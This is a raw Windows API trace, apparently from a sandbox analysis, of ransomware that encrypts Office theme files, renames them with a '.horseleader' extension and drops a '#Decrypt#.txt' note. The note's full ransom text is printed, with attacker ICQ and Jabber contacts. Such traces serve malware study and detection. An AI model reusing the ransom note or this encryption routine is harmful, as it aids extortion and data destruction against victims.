1 [0247.958] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.959] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x7e20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.959] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.959] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.960] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.960] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfc40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.960] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.960] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.961] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.961] CloseHandle (hObject=0x1a4) returned 1 [0247.962] GetProcessHeap () returned 0x780000 [0247.962] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.962] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM.horseleader") returned 87 [0247.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm.horseleader")) returned 1 [0247.965] GetProcessHeap () returned 0x780000 [0247.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.965] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SLATE.INF", cAlternateFileName="")) returned 1 [0247.965] lstrcmpiW (lpString1="SLATE.INF", lpString2="Windows") returned -1 [0247.965] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0247.965] StrStrIW (lpFirst="SLATE.INF", lpSrch=".horseleader") returned 0x0 [0247.965] lstrcmpW (lpString1="SLATE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.965] lstrcmpW (lpString1="SLATE.INF", lpString2="_uninstalling_.png") returned 1 [0247.966] lstrlenW (lpString=".testttjffg") returned 11 [0247.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF", lpSrch=".testttjffg") returned 0x0 [0247.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.968] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0247.968] StrStrW (lpFirst="SLATE.INF", lpSrch=".txt") returned 0x0 [0247.968] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=500) returned 1 [0247.968] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.970] CloseHandle (hObject=0x1a4) returned 1 [0247.970] GetProcessHeap () returned 0x780000 [0247.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.970] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF.horseleader") returned 87 [0247.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf.horseleader")) returned 1 [0247.973] GetProcessHeap () returned 0x780000 [0247.973] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6a29, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.973] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.973] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0247.973] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.973] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.973] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.973] lstrlenW (lpString=".testttjffg") returned 11 [0247.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.974] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0247.974] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.974] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=27177) returned 1 [0247.974] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.978] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.978] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a29, lpOverlapped=0x0) returned 1 [0247.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5d7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a29, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a29, lpOverlapped=0x0) returned 1 [0247.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.979] CloseHandle (hObject=0x1a4) returned 1 [0247.979] GetProcessHeap () returned 0x780000 [0247.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.980] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.horseleader") returned 90 [0247.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.horseleader")) returned 1 [0247.980] GetProcessHeap () returned 0x780000 [0247.980] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6a29, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.981] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.981] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\#Decrypt#.txt") returned 79 [0247.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.981] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.981] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.983] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.983] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.983] CloseHandle (hObject=0x158) returned 1 [0247.983] GetProcessHeap () returned 0x780000 [0247.983] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.983] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SONORA", cAlternateFileName="")) returned 1 [0247.983] lstrcmpiW (lpString1="SONORA", lpString2="Windows") returned -1 [0247.983] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned 66 [0247.983] lstrcmpW (lpString1="SONORA", lpString2=".") returned 1 [0247.983] lstrcmpW (lpString1="SONORA", lpString2="..") returned 1 [0247.983] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.983] GetProcessHeap () returned 0x780000 [0247.983] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.983] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*") returned 68 [0247.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.987] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.987] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\.") returned 68 [0247.987] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.987] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.988] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.988] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\..") returned 69 [0247.988] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.988] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.988] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.988] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.988] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0247.988] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.988] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.988] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.988] lstrlenW (lpString=".testttjffg") returned 11 [0247.988] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.990] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0247.990] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.990] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2209) returned 1 [0247.990] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x8a1, lpOverlapped=0x0) returned 1 [0247.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff75f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x8a1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x8a1, lpOverlapped=0x0) returned 1 [0247.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, 